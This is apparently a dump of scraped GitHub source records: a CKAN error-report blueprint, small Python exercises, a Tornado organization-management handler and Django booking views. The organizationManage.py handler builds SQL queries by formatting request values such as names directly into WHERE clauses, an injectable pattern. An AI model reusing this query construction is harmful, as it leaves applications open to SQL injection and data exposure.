url_prefix=\"/error_report\"\n)\n\n\n@error_report_blueprint.route(\"/\")\ndef get_error_reports():\n return _get_error_reports_list(\"error_report_list_public\", True)\n\n\n@error_report_blueprint.route(\"/rejected_error_reports\")\ndef get_error_reports_list():\n return _get_error_reports_list(\"error_report_list_public\")\n\n\n@error_report_blueprint.route(\"/my_error_reports\")\ndef get_my_error_reports():\n return _get_error_reports_list(\"my_error_report_list\", True)\n\n\n@error_report_blueprint.route(\"/submitted_error_reports\")\ndef get_submitted_error_reports():\n return _get_error_reports_list(\"submitted_error_report_list\", True)\n\n\ndef _request_url_(params_nopage, requests_type, q=None, page=None):\n params = list(params_nopage)\n params.append((\"page\", page))\n url = request.url_rule.rule\n\n return url_with_params(url, params)\n\n\ndef _get_error_reports_list(ckan_action: str, should_show_create_action: bool = False):\n try:\n error_reports = toolkit.get_action(ckan_action)(\n context={\n \"user\": toolkit.g.user,\n \"dictize_for_ui\": True,\n },\n data_dict={},\n )\n except toolkit.NotAuthorized:\n result = toolkit.abort(\n 403,\n toolkit._(\"Not authorized to list error reports\"),\n )\n\n else:\n params_nopage = [\n (k, v) for k, v in request.args.items(multi=True) if k != \"page\"\n ]\n params_nosort = [(k, v) for k, v in params_nopage]\n pager_url = partial(_request_url_, params_nosort, None)\n page = h.get_page_number(request.args)\n extra_vars = {\n \"error_reports\": error_reports,\n \"statuses\": get_status_labels(),\n \"show_create_button\": should_show_create_action,\n \"page\": h.Page(\n collection=error_reports,\n items_per_page=20,\n url=pager_url,\n page=page,\n item_count=len(error_reports),\n ),\n }\n result = toolkit.render(\"error_report/list.html\", extra_vars=extra_vars)\n return result\n\n\nclass ErrorReportCreateView(MethodView):\n def get(self, data=None, errors=None, error_summary=None):\n toolkit.check_access(\"error_report_create_auth\", {\"user\": toolkit.g.user})\n data_to_show = data or clean_dict(\n dict_fns.unflatten(\n tuplize_dict(parse_params(request.args, ignore_keys=CACHE_PARAMETERS))\n )\n )\n packages = ckan.model.Session.query(ckan.model.Package).all()\n\n metadata_records = [\n {\"value\": record.id, \"text\": record.title} for record in packages\n ]\n\n selected_metadata_record = request.args.get(\"metadata_record\", None)\n\n extra_vars = {\n \"form_snippet\": \"error_report/snippets/report_form.html\",\n \"enable_owner_fieldset\": True,\n \"enable_nsif_fieldset\": False,\n \"csi_reference_id\": None,\n \"data\": data_to_show,\n \"metadata_records\": metadata_records,\n \"selected_record\": selected_metadata_record,\n \"errors\": errors or {},\n \"error_summary\": error_summary or {},\n }\n return toolkit.render(\"error_report/edit.html\", extra_vars=extra_vars)\n\n def post(self):\n try:\n data_dict = clean_dict(\n dict_fns.unflatten(tuplize_dict(parse_params(request.form)))\n )\n except dict_fns.DataError:\n result = toolkit.abort(\n 400, toolkit._(\"Integrity Error, problem in parsing form parameters\")\n )\n else:\n if data_dict.get(\"metadata_record\") is None:\n data_dict[\"metadata_record\"] = request.args.get(\"metadata_record\")\n try:\n data_dict[\"owner_user\"] = toolkit.g.user\n error_report = toolkit.get_action(\"error_report_create\")(\n context={\n \"user\": toolkit.g.user,\n \"auth_user_obj\": toolkit.g.userobj,\n },\n data_dict=data_dict,\n )\n except toolkit.ObjectNotFound:\n result = toolkit.abort(404, toolkit._(\"Error report not found\"))\n except toolkit.ValidationError as exc:\n errors = exc.error_dict\n error_summary = exc.error_summary\n result = self.get(\n data=data_dict, errors=errors, error_summary=error_summary\n )\n else:\n url = toolkit.h.url_for(\n \"error_report.error_report_show\",\n csi_reference_id=error_report[\"csi_reference_id\"],\n )\n result = toolkit.h.redirect_to(url)\n return result\n\n\nnew_error_report_view = ErrorReportCreateView.as_view(\"new_error_report\")\nerror_report_blueprint.add_url_rule(\"/new/\", view_func=new_error_report_view)\n#\n#\n\n\nclass ErrorReportUpdateView(MethodView):\n show_action = \"error_report_show\"\n success_redirect_to_view = \"error_report.error_report_show\"\n update_auth: typing.Optional[str] = None\n update_action: typing.Optional[str] = None\n template_path = \"error_report/edit.html\"\n form_snippet = \"error_report/snippets/report_form.html\"\n enable_owner_fieldset = True\n enable_nsif_fieldset = False\n\n def get(\n self,\n csi_reference_id: str,\n data: typing.Optional[typing.Dict] = None,\n errors: typing.Optional[typing.Dict] = None,\n error_summary=None,\n ):\n context = _prepare_context()\n try:\n old_data = toolkit.get_action(self.show_action)(\n context, data_dict={\"csi_reference_id\": csi_reference_id}\n )\n if data is not None:\n old_data.update(data)\n data = old_data\n\n packages = ckan.model.Session.query(ckan.model.Package).all()\n\n metadata_records = [\n {\"value\": record.id, \"text\": record.title} for record in packages\n ]\n selected_metadata_record = request.args.get(\"metadata_record\", None)\n except (toolkit.ObjectNotFound, toolkit.NotAuthorized):\n result = toolkit.abort(404, toolkit._(\"Error report not found\"))\n else:\n try:\n toolkit.check_access(\n self.update_auth,\n context,\n data_dict={\"csi_reference_id\": csi_reference_id},\n )\n except toolkit.NotAuthorized:\n result = toolkit.abort(\n 403,\n toolkit._(\"User %r not authorized to edit %s\")\n % (toolkit.g.user, csi_reference_id),\n )\n else:\n result = toolkit.render(\n self.template_path,\n extra_vars={\n \"form_snippet\": self.form_snippet,\n \"enable_owner_fieldset\": self.enable_owner_fieldset,\n \"enable_nsif_fieldset\": self.enable_nsif_fieldset,\n \"data\": data,\n \"metadata_records\": metadata_records,\n \"selected_record\": selected_metadata_record,\n \"csi_reference_id\": csi_reference_id,\n \"errors\": errors or {},\n \"error_summary\": error_summary or {},\n },\n )\n return result\n\n def post(self, csi_reference_id: str):\n try:\n data_dict = clean_dict(\n dict_fns.unflatten(tuplize_dict(parse_params(request.form)))\n )\n data_dict[\"csi_reference_id\"] = csi_reference_id\n except dict_fns.DataError:\n result = toolkit.abort(400, toolkit._(\"Integrity Error\"))\n else:\n context = _prepare_context()\n try:\n toolkit.get_action(self.update_action)(context, data_dict)\n except toolkit.NotAuthorized as exc:\n result = toolkit.base.abort(\n 403,\n toolkit._(\"Unauthorized to update error report, %s\") % exc,\n )\n except toolkit.ObjectNotFound:\n result = toolkit.base.abort(404, toolkit._(\"Error report not found\"))\n except toolkit.ValidationError as exc:\n errors = exc.error_dict\n error_summary = exc.error_summary\n result = self.get(\n csi_reference_id,\n data=data_dict,\n errors=errors,\n error_summary=error_summary,\n )\n else:\n url = toolkit.h.url_for(\n self.success_redirect_to_view, csi_reference_id=csi_reference_id\n )\n result = toolkit.h.redirect_to(url)\n return result\n\n\nclass ErrorReportOwnerUpdateView(ErrorReportUpdateView):\n update_auth = \"error_report_update_by_owner_auth\"\n update_action = \"error_report_update_by_owner\"\n enable_owner_fieldset = True\n enable_nsif_fieldset = False\n\n\n# came back here to feature data in the EMC\nclass ErrorReportNsifUpdateView(ErrorReportUpdateView):\n update_auth = \"error_report_update_by_nsif_auth\"\n update_action = \"error_report_update_by_nsif\"\n enable_owner_fieldset = False\n enable_nsif_fieldset = True\n\n\nowner_edit_error_report_view = ErrorReportOwnerUpdateView.as_view(\n \"owner_edit_error_report\"\n)\nerror_report_blueprint.add_url_rule(\n \"//owner_edit/\",\n view_func=owner_edit_error_report_view,\n)\n\nnsif_edit_error_report_view = ErrorReportNsifUpdateView.as_view(\n \"nsif_edit_error_report\"\n)\nerror_report_blueprint.add_url_rule(\n \"//nsif_edit/\", view_func=nsif_edit_error_report_view\n)\n\n#\n# error_report show page\n\n\n@error_report_blueprint.route(\"/show/\")\ndef error_report_show(csi_reference_id):\n try:\n error_report = toolkit.get_action(\"error_report_show\")(\n context={\"dictize_for_ui\": True},\n data_dict={\"csi_reference_id\": csi_reference_id},\n )\n except toolkit.ObjectNotFound:\n result = toolkit.abort(404, toolkit._(\"Error report not found\"))\n except toolkit.NotAuthorized:\n result = toolkit.base.abort(401, toolkit._(\"Not authorized\"))\n else:\n extra_vars = {\n \"error_report\": error_report,\n }\n result = toolkit.render(\"error_report/show.html\", extra_vars=extra_vars)\n return result\n\n\nclass ErrorReportModerateView(MethodView):\n template_name = \"error_report/moderate.html\"\n actions = {\n \"nsif\": {\n \"message\": \"Moderate error report on behalf of NSIF\",\n \"ckan_action\": \"error_report_nsif_moderate\",\n }\n }\n\n def get(self, csi_reference_id: str):\n context = _prepare_context()\n try:\n error_report = toolkit.get_action(\"error_report_show\")(\n context, data_dict={\"csi_reference_id\": csi_reference_id}\n )\n except toolkit.ObjectNotFound:\n result = toolkit.abort(404, toolkit._(\"Error report not found\"))\n except toolkit.NotAuthorized:\n result = toolkit.abort(\n 403, toolkit._(\"Unauthorized to moderate error report\")\n )\n else:\n result = toolkit.render(\n self.template_name,\n extra_vars={\n \"error_report\": error_report,\n \"action\": self.actions.get(\"nsif\", {}).get(\"message\"),\n \"action_url\": toolkit.h[\"url_for\"](\n \"error_report.error_report_moderate\",\n csi_reference_id=csi_reference_id,\n ),\n },\n )\n return result\n\n def post(self, csi_reference_id: str):\n data_dict = {\n \"csi_reference_id\": csi_reference_id,\n \"action\": list(request.form.keys())[0],\n }\n try:\n ckan_action = self.actions.get(\"nsif\", {}).get(\"ckan_action\")\n logger.info(f\" ckan action {ckan_action}\")\n toolkit.get_action(ckan_action)(_prepare_context(), data_dict=data_dict)\n except toolkit.ObjectNotFound:\n result = toolkit.abort(404, toolkit._(\"Report not found\"))\n except toolkit.NotAuthorized:\n result = toolkit.abort(\n 403, toolkit._(\"Unauthorized to submit moderation for error report\")\n )\n else:\n toolkit.h[\"flash_notice\"](toolkit._(\"Moderation submitted\"))\n result = toolkit.redirect_to(\n toolkit.h[\"url_for\"](\n \"error_report.error_report_show\", csi_reference_id=csi_reference_id\n )\n )\n return result\n\n\nmoderate_error_report_view = ErrorReportModerateView.as_view(\"error_report_moderate\")\nerror_report_blueprint.add_url_rule(\n \"//moderate/\",\n view_func=moderate_error_report_view,\n)\n\n\nclass ErrorReportDeleteView(MethodView):\n def get(self, csi_reference_id: str):\n context = _prepare_context()\n try:\n error_report = toolkit.get_action(\"error_report_show\")(\n context, data_dict={\"csi_reference_id\": csi_reference_id}\n )\n except toolkit.ObjectNotFound:\n return toolkit.abort(404, toolkit._(\"Error report not found\"))\n except toolkit.NotAuthorized:\n return toolkit.abort(403, toolkit._(\"Unauthorized to delete error report\"))\n return toolkit.render(\n \"error_report/ask_for_confirmation.html\",\n extra_vars={\n \"error_report\": error_report,\n \"action\": \"delete\",\n \"action_url\": toolkit.h[\"url_for\"](\n \"error_report.error_report_delete\",\n csi_reference_id=csi_reference_id,\n ),\n },\n )\n\n def post(self, csi_reference_id: str):\n if \"cancel\" not in request.form.keys():\n context = _prepare_context()\n try:\n toolkit.get_action(\"error_report_delete\")(\n context, data_dict={\"csi_reference_id\": csi_reference_id}\n )\n except toolkit.ObjectNotFound:\n result = toolkit.abort(404, toolkit._(\"Error report not found\"))\n except toolkit.NotAuthorized:\n result = toolkit.abort(\n 403, toolkit._(\"Unauthorized to delete error report %s\") % \"\"\n )\n else:\n toolkit.h[\"flash_notice\"](toolkit._(\"Error report has been deleted.\"))\n result = toolkit.redirect_to(\n toolkit.h[\"url_for\"](\"error_report.get_error_reports\")\n )\n else:\n result = toolkit.h.redirect_to(\n toolkit.h[\"url_for\"](\n \"error_report.error_report_show\", csi_reference_id=csi_reference_id\n )\n )\n return result\n\n\ndelete_error_report_view = ErrorReportDeleteView.as_view(\"error_report_delete\")\nerror_report_blueprint.add_url_rule(\n \"//delete/\", view_func=delete_error_report_view\n)\n\n\ndef _prepare_context() -> typing.Dict:\n context = {\n \"model\": ckan.model,\n \"session\": ckan.model.Session,\n \"user\": toolkit.g.user,\n \"auth_user_obj\": toolkit.g.userobj,\n }\n return context\n","repo_name":"kartoza/ckanext-dalrrd-emc-dcpr","sub_path":"ckanext/dalrrd_emc_dcpr/blueprints/error_report.py","file_name":"error_report.py","file_ext":"py","file_size_in_byte":16144,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"3076041119","text":"from collections import Counter\nimport csv\n\nwith open('name_log.csv', encoding='UTF-8') as file:\n data = list(csv.DictReader(file))\n\nlg_changes = Counter()\nfor ddict in data:\n lg_changes[ddict['email']] += 1\n\n[print(f'{email}: {num}') for email, num in sorted(lg_changes.items())]","repo_name":"Bl00dWolf/Stepik_Course","sub_path":"Course for profi/6. Дополнительные типы коллекций/6.8 Тип данных Counter. Часть 2/6.8.18 Here we go again.py","file_name":"6.8.18 Here we go again.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22569941277","text":"# p.201 떡볶이 떡 만들기\n\ndef solution(nm, rice_cakes):\n n, m = nm\n start, end = 0, max(rice_cakes)\n while start <= end:\n mid = (start + end) // 2\n total = 0\n for rice_cake in rice_cakes:\n total += max(rice_cake - mid, 0)\n if total < m:\n end = mid - 1\n elif total > m:\n start = mid + 1\n else:\n start += 1\n return start - 1\n\n\n# print(solution([4, 6], [19, 15, 10, 17])) # 15\n","repo_name":"jjinyeok/this_is_coding_test","sub_path":"binary_search_3.py","file_name":"binary_search_3.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27250218292","text":"#coding:utf-8\r\n\r\nimport sys\r\nimport time\r\nimport datetime\r\n\r\nfrom db import dbMysql\r\nfrom libs.web.Base import WebRequestHandler,BaseError,operator_except\r\nfrom system.operationLog.entity import operation_log,LOG_ADD,LOG_UPDATE,LOG_DELETE \r\nfrom libs.utils.debug import *\r\nfrom libs.utils.utils import *\r\n\r\nfrom libs.JCL.JCLCommon import *\r\n\r\nfrom config import *\r\n\r\nfrom system.accountManage import account\r\nfrom public.areaCodeManage import *\r\n\r\nimport xlrd, xlwt\r\nfrom public.excel import excel\r\n\r\nclass organizationManage(dbMysql.CURD) :\r\n def __init__(self,db) :\r\n if sys.version > '3':\r\n # python 3.0 +\r\n super().__init__(db,'public.organization',False) # 定义本实例需要操作的表名\r\n else :\r\n # python 2.7\r\n super(organizationManage, self).__init__(db,'public.organization',False)\r\n\r\nclass Restful(WebRequestHandler):\r\n\r\n @operator_except\r\n def get(self):\r\n\r\n op = self.get_argument(\"op\", default='')\r\n\r\n organizationID = int(self.get_argument(\"oid\", default='0'))\r\n organizationType= self.get_argument(\"ot\", default='')\r\n systemUserID = self.GetSystemUserID()\r\n\r\n offset = int(self.get_argument('o', default = '1'))\r\n rowlimit = int(self.get_argument('r', default = '20'))\r\n\r\n offset = ( offset - 1 ) * rowlimit\r\n sql_limit = \" limit \" + str(rowlimit) + \" offset \" + str(offset)\r\n\r\n sql = \"\"\"\r\n select po.id, po.name, po.name_en, po.abbr, po.abbr_en, po.organization_type, po.registe_date, po.registe_addr, po.current_addr, \r\n po.business_scope, po.social_credit_code, po.legal_representative, po.legal_id_type, po.legal_id_no,\r\n po.contactor_name, po.contactor_mobile, po.logo_file, po.description, po.system_user_id\r\n from public.organization po\r\n \"\"\"\r\n sql_where = ' where po.system_user_id = %d'%systemUserID\r\n if organizationType != '':\r\n sql_where += \" and po.organization_type = '%s'\"%organizationType \r\n if organizationID > 0:\r\n sql_where += ' and po.id = %d'%organizationID\r\n\r\n sql += sql_where\r\n sql += \" order by po.id desc\" \r\n\r\n if op == \"list\":\r\n sql += sql_limit\r\n\r\n cur = self.db.getCursor()\r\n cur.execute(sql)\r\n rows = cur.fetchall()\r\n\r\n if op == \"excel\":\r\n self.exportToExcel( rows )\r\n else:\r\n rowdata = {}\r\n rowdata['struct'] = \"id, name, name_en, abbr, abbr_en, organization_type, registe_date, registe_addr, current_addr, business_scope, social_credit_code\"\r\n rowdata['struct'] += \", legal_representative, legal_id_type, legal_id_no, contactor_name, contactor_mobile, logo_file, description, system_user_id\"\r\n rowdata['rows'] = rows\r\n\r\n sql = \"select count(*) from public.organization po\"\r\n sql += sql_where\r\n cur.execute(sql)\r\n row = cur.fetchone() \r\n rowdata['count'] = row[0]\r\n self.response(rowdata)\r\n\r\n # 输出供应商到excel文件\r\n def exportToExcel(self, rowdata):\r\n\r\n key = ['id', 'name', 'name_en', 'abbr', 'abbr_en', 'organization_type', 'registe_date', 'registe_addr', 'current_addr', 'business_scope',\r\n 'social_credit_code', 'legal_representative', 'legal_id_type', 'legal_id_no', 'contactor_name', 'contactor_mobile',\r\n 'logo_file', 'description', 'system_user_id']\r\n\r\n organizationList = []\r\n for i, item in enumerate(rowdata):\r\n organizationInfo = dict(zip(key, item))\r\n organizationList.append(organizationInfo)\r\n\r\n cur = self.db.getCursor()\r\n getDataDict(cur, organizationList, \"organization_type\", \"ORGANIZATION_TYPE\", \"organization_type_name\")\r\n \r\n data = []\r\n sn = 1\r\n for item in organizationList:\r\n\r\n itemData = []\r\n itemData.append( sn )\r\n sn = sn + 1\r\n itemData.append( item['name'] )\r\n itemData.append( item['name_en'] )\r\n itemData.append( item['abbr'])\r\n itemData.append( item['abbr_en'])\r\n itemData.append( item['organization_type_name'])\r\n itemData.append( item['registe_date'])\r\n itemData.append( item['registe_addr'])\r\n itemData.append( item['current_addr'])\r\n itemData.append( item['business_scope'])\r\n itemData.append( item['social_credit_code'])\r\n itemData.append( item['legal_representative'])\r\n itemData.append( item['contactor_name'])\r\n itemData.append( item['contactor_mobile'])\r\n itemData.append( item['description'])\r\n\r\n data.append(itemData) \r\n\r\n struct = \"SN, 名称, 名称(英), 中文缩写, 英文缩写, 类型, 注册日期, 注册地址, 当前地址, 经营范围, 社会信用代码, 法人代表, 联系人员, 电话号码, 描述\"\r\n\r\n path = {}\r\n path = excel.createTempFile(\"xls\")\r\n \r\n excel.saveExcel(path['path'], struct, data )\r\n\r\n logInfo = \" %s 下载了组织团体清单 \"%self.objUserInfo['name']\r\n operation_log(self.db).addLog(self.GetUserInfo(), \"organizationManage\", logInfo, 0)\r\n\r\n self.response(path)\r\n\r\n # 传递的参数中,需要包括:\r\n @operator_except\r\n def post(self):\r\n\r\n alldata = self.getRequestData()\r\n\r\n s = organizationManage(self.db)\r\n\r\n lsData = {\r\n 'name' : 'name',\r\n 'name_en' : 'name_en',\r\n 'abbr' : 'abbr',\r\n 'abbr_en' : 'abbr_en',\r\n 'registe_date' : 'registe_date',\r\n 'registe_addr' : 'registe_addr',\r\n 'current_addr' : 'current_addr',\r\n 'organization_type' : 'organization_type',\r\n 'business_scope' : 'business_scope',\r\n 'social_credit_code' : 'social_credit_code',\r\n 'legal_representative' :'legal_representative',\r\n 'legal_id_type' : 'legal_id_type',\r\n 'legal_id_no' : 'legal_id_no',\r\n 'contactor_name' : 'contactor_name',\r\n 'contactor_mobile' : 'contactor_mobile',\r\n 'logo_file' : 'logo_file',\r\n 'description' : 'description',\r\n }\r\n\r\n data = {}\r\n for (k, v) in lsData.items():\r\n try:\r\n data[k] = alldata[v]\r\n except:\r\n pass\r\n\r\n\r\n userInfo = self.GetUserInfo()\r\n\r\n data['system_user_id'] = userInfo['system_user_id']\r\n\r\n db = self.getDB('public.organization')\r\n\r\n # 检查是否重复,同一个System_User_ID里面只能有一个\r\n result = db.findByCond(\"name\", \" (name = '%s' or name_en = '%s') and system_user_id = %d \"%(data['name'], data['name_en'], data['system_user_id']))\r\n if len( result['rows'] ) > 0 :\r\n raise BaseError(801, \"参数错误: 组织 %s 已经存在!\"%data['name'])\r\n\r\n\r\n data['create_id'] = userInfo['id']\r\n data['create_time'] = GetSystemTime()\r\n id = s.save(data, table='public.organization')\r\n\r\n logInfo = \"创建:%s,%s\"%(data['name'], data['name_en'])\r\n operation_log(self.db).addLog(self.GetUserInfo(), \"organizationManage\", logInfo, id)\r\n\r\n self.response(id)\r\n\r\n @operator_except\r\n def put(self):\r\n\r\n alldata = self.getRequestData()\r\n if self.getParam( alldata, \"id\", 0) == 0:\r\n raise BaseError(801, \"参数错误:缺少待更新供应商的ID!\")\r\n\r\n s = organizationManage(self.db)\r\n \r\n lsData = {\r\n 'id' : 'id',\r\n 'name' : 'name',\r\n 'name_en' : 'name_en',\r\n 'abbr' : 'abbr',\r\n 'abbr_en' : 'abbr_en',\r\n 'registe_date' : 'registe_date',\r\n 'registe_addr' : 'registe_addr',\r\n 'organization_type' : 'organization_type',\r\n 'current_addr' : 'current_addr',\r\n 'business_scope' : 'business_scope',\r\n 'social_credit_code' : 'social_credit_code',\r\n 'legal_representative' :'legal_representative',\r\n 'legal_id_type' : 'legal_id_type',\r\n 'legal_id_no' : 'legal_id_no',\r\n 'contactor_name' : 'contactor_name',\r\n 'contactor_mobile' : 'contactor_mobile',\r\n 'logo_file' : 'logo_file',\r\n 'description' : 'description',\r\n 'system_user_id' : 'system_user_id',\r\n }\r\n\r\n data = {}\r\n for (k, v) in lsData.items():\r\n try:\r\n data[k] = alldata[v]\r\n except:\r\n pass\r\n\r\n db = self.getDB('public.organization')\r\n \r\n # 检查是否重复,同一个System_User_ID里面只能有一个\r\n result = db.findByCond(\"name\", \" (name = '%s' or name_en = '%s') and system_user_id = %d and id <> %d\"%(data['name'], data['name_en'], data['system_user_id'], data['id']))\r\n if len( result['rows'] ) > 0 :\r\n raise BaseError(801, \"参数错误: 组织 %s 已经存在!\"%data['name'])\r\n\r\n userInfo = self.GetUserInfo()\r\n data['update_id'] = userInfo['id']\r\n data['update_time'] = GetSystemTime()\r\n\r\n id = s.save(data, data['id'], table='public.organization')\r\n\r\n logInfo = \"更新组织团体信息:%s,%s\"%(data['name'], data['name_en'])\r\n operation_log(self.db).addLog( userInfo, \"organizationManage\", logInfo, id)\r\n\r\n self.response(id)\r\n\r\n\r\n @operator_except\r\n def delete(self):\r\n\r\n alldata = self.getRequestData()\r\n orgID = self.getParam( alldata, \"id\", 0)\r\n if orgID == 0:\r\n raise BaseError(801, \"参数错误:缺少待删除的供应商ID!\")\r\n\r\n logInfo = '组织团体 %s 被删除'%alldata['name']\r\n\r\n # 删除记录\r\n s = organizationManage(self.db)\r\n s.remove( orgID, table = \"public.organization\", key = \"id\", delete = True)\r\n\r\n # 记录日志并退出\r\n operation_log(self.db).addLog(self.GetUserInfo(), \"organizationManage\", logInfo, orgID)\r\n self.response(orgID)\r\n\r\n @operator_except\r\n def patch(self):\r\n\r\n paramData = self.getRequestData()\r\n systemUserID = self.GetSystemUserID()\r\n\r\n op = self.getParam(paramData, \"op\", \"\")\r\n cur = self.db.getCursor()\r\n\r\n allData = {}\r\n\r\n if op == 'list':\r\n # 获取所有团体清单\r\n sql = \"\"\"\r\n select po.id, po.name\r\n from public.organization po \r\n where po.system_user_id = %d\r\n \"\"\"%systemUserID\r\n\r\n cur.execute(sql)\r\n rows = cur.fetchall()\r\n allOrganizationList = {}\r\n allOrganizationList['rows'] = [(0, \"选择全部\", )] + rows\r\n allOrganizationList['struct'] = 'id, name'\r\n\r\n allData['allOrganizationList'] = allOrganizationList\r\n\r\n # 获取组织团体类型清单\r\n sql = \"select cv.code, cv.name \"\r\n sql += \" from system.code_value cv\"\r\n sql += \" where cv.type_code = 'ORGANIZATION_TYPE' \"\r\n sql += \" order by cv.sort\"\r\n\r\n cur = self.db.getCursor()\r\n cur.execute(sql)\r\n rows = cur.fetchall()\r\n\r\n organizationTypeList = {}\r\n organizationTypeList['struct'] = \"code, name\"\r\n organizationTypeList['rows'] = [('0', \"选择全部\", )] + rows\r\n\r\n allData['organizationTypeList'] = organizationTypeList\r\n\r\n # 获取证件类型清单\r\n sql = \"select cv.code, cv.name \"\r\n sql += \" from system.code_value cv\"\r\n sql += \" where cv.type_code = 'IDENTITY_TYPE' \"\r\n sql += \" order by cv.sort\"\r\n\r\n cur = self.db.getCursor()\r\n cur.execute(sql)\r\n rows = cur.fetchall()\r\n\r\n identifyTypeList = {}\r\n identifyTypeList['struct'] = \"code, name\"\r\n identifyTypeList['rows'] = [('0', \"选择全部\", )] + rows\r\n\r\n allData['identifyTypeList'] = identifyTypeList\r\n\r\n self.response(allData)\r\n\r\n\r\n","repo_name":"zhangweijia-fuma/JCL","sub_path":"JDS/src/service/public/organizationManage.py","file_name":"organizationManage.py","file_ext":"py","file_size_in_byte":12569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73401102312","text":"from django.db import transaction\nfrom django.utils import timezone\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.exceptions import NotFound, ParseError, PermissionDenied\nfrom rest_framework.status import HTTP_204_NO_CONTENT\nfrom rest_framework.permissions import IsAuthenticatedOrReadOnly\n\nfrom .models import Perk, Experience\nfrom .serializers import PerkSerializer, ExperienceSerializer, ExperienceDetailSerializer\n\nfrom categories.models import Category\nfrom bookings.models import Booking\nfrom bookings.serializers import PublicBookingSerializer, CreateRoomBookingSerializer\n\nclass Experiences(APIView):\n\n permission_classes = [IsAuthenticatedOrReadOnly]\n\n def get(self, request):\n all_experiences = Experience.objects.all()\n serializer = ExperienceSerializer(all_experiences, many=True)\n return Response(serializer.data)\n\n def post(self, request):\n serializer = ExperienceSerializer(data=request.data)\n if serializer.is_valid():\n category_pk = request.data.get(\"category\")\n if not category_pk:\n raise ParseError(\"Category is required\")\n try:\n category = Category.objects.get(pk=category_pk)\n if category.kind == Category.CategoryKindChoices.ROOMS:\n raise ParseError(\"The category kind should be experience\")\n except Category.DoesNotExist:\n raise ParseError(\"Category not found\")\n experience = serializer.save(\n host=request.user,\n category=category,\n )\n perks = request.data.get(\"perks\")\n if perks:\n for perk_pk in perks:\n perk = Perk.objects.get(pk=perk_pk)\n experience.perks.add(perk)\n serializer = ExperienceSerializer(experience)\n return Response(serializer.data)\n else:\n return Response(serializer.errors)\n\nclass ExperienceDetail(APIView):\n\n permission_classes = [IsAuthenticatedOrReadOnly]\n def get_object(self, pk):\n try:\n return Experience.objects.get(pk=pk)\n except Experience.DoesNotExist:\n raise NotFound\n def get(self, request, pk):\n experience = self.get_object(pk)\n serializer = ExperienceDetailSerializer(\n experience,\n context={\"request\":request},\n )\n return Response(serializer.data)\n\n\n def put(self, request, pk):\n experience = self.get_object(pk)\n if experience.host != request.user:\n raise PermissionDenied\n serializer = ExperienceDetailSerializer(\n experience,\n data=request.data,\n partial=True,\n )\n if serializer.is_valid():\n\n category_pk = request.data.get(\"category\")\n if category_pk:\n category = Category.objects.get(pk=category_pk)\n if category.kind == Category.CategoryKindChoices.ROOMS:\n raise ParseError(\"The category kind should be experience\")\n \n with transaction.atomic():\n if 'category' in locals():\n experience = serializer.save(\n host=request.user,\n category=category,\n )\n else:\n experience = serializer.save(host=request.user)\n\n perks = request.data.get(\"perks\")\n print(perks)\n try:\n if perks:\n experience.perks.clear()\n for perk_pk in perks:\n perk = Perk.objects.get(pk=perk_pk)\n experience.perks.add(perk)\n except Exception:\n raise ParseError(\"perk not found\")\n\n serializer = ExperienceDetailSerializer(\n experience,\n context={\"request\":request},\n )\n return Response(serializer.data)\n \n \n else:\n Response(serializer.errors)\n \n\n def delete(self, request, pk):\n experience = self.get_object(pk)\n if experience.host != request.user:\n raise PermissionDenied\n experience.delete()\n return Response(status=HTTP_204_NO_CONTENT)\n\nclass ExperienceBookings(APIView):\n\n permission_classes = [IsAuthenticatedOrReadOnly]\n\n def get_object(self, pk):\n try:\n return Experience.objects.get(pk=pk)\n except:\n raise NotFound\n \n def get(self, request, pk):\n experience = self.get_object(pk)\n now = timezone.localtime(timezone.now()).date()\n bookings = Booking.objects.filter(\n experience=experience,\n check_in__gt=now,\n )\n \n serializer = PublicBookingSerializer(\n bookings,\n many=True,\n )\n return Response(serializer.data)\n\n def post(self, request, pk):\n experience = self.get_object(pk)\n serializer = CreateRoomBookingSerializer(data=request.data)\n if serializer.is_valid():\n booking = serializer.save(\n experience=experience,\n user=request.user,\n kind=Booking.BookingKindChoices.EXPERIENCE,\n )\n serializer = PublicBookingSerializer(booking)\n return Response(serializer.data)\n else:\n return Response(serializer.errors)\n\nclass ExperienceBookingDetail(APIView):\n\n permission_classes = [IsAuthenticatedOrReadOnly]\n\n def get_object(self, pk):\n try:\n return Experience.objects.get(pk=pk)\n except Experience.DoesNotExist:\n raise NotFound(\"experience\")\n\n def get_booking(self, booking_pk):\n try:\n return Booking.objects.get(pk=booking_pk)\n except Booking.DoesNotExist:\n raise NotFound(\"booking\")\n\n def get(self, request, pk, booking_pk):\n try:\n experience = self.get_object(pk)\n now = timezone.localtime(timezone.now()).date()\n booking = Booking.objects.filter(experience=experience, pk=booking_pk, check_in__gt=now)[0]\n \n serializer = PublicBookingSerializer(booking)\n \n return Response(serializer.data)\n except :\n raise ParseError(\"예약이 없습니다.\")\n\n \n def put(self, request, pk, booking_pk):\n experience = self.get_object(pk)\n now = timezone.localtime(timezone.now()).date()\n booking = Booking.objects.filter(experience=experience, pk=booking_pk, check_in__gt=now)[0]\n serializer = CreateRoomBookingSerializer(\n booking,\n data=request.data,\n partial=True,\n )\n if serializer.is_valid():\n booking = serializer.save(user=request.user)\n serializer = PublicBookingSerializer(booking)\n return Response(serializer.data)\n else:\n return Response(serializer.errors)\n\n def delete(self, request, pk, booking_pk):\n booking = self.get_booking(booking_pk)\n booking.delete()\n return Response(HTTP_204_NO_CONTENT)\n \n \n\nclass Perks(APIView):\n\n def get(self, request):\n all_perks = Perk.objects.all()\n serializer = PerkSerializer(all_perks, many=True)\n return Response(serializer.data)\n \n def post(self, request):\n serializer = PerkSerializer(data=request.data)\n if serializer.is_valid():\n perk = serializer.save()\n return Response(\n PerkSerializer(perk).data,\n )\n else:\n return Response(serializer.errors)\n\nclass PerkDetail(APIView):\n\n def get_object(self, pk):\n try:\n return Perk.objects.get(pk=pk)\n except Perk.DoesNotExist:\n raise NotFound\n\n def get(self, request, pk):\n perk = self.get_object(pk)\n serializer = PerkSerializer(perk)\n return Response(serializer.data)\n\n def put(self, request, pk):\n perk = self.get_object(pk)\n serializer = PerkSerializer(\n perk,\n 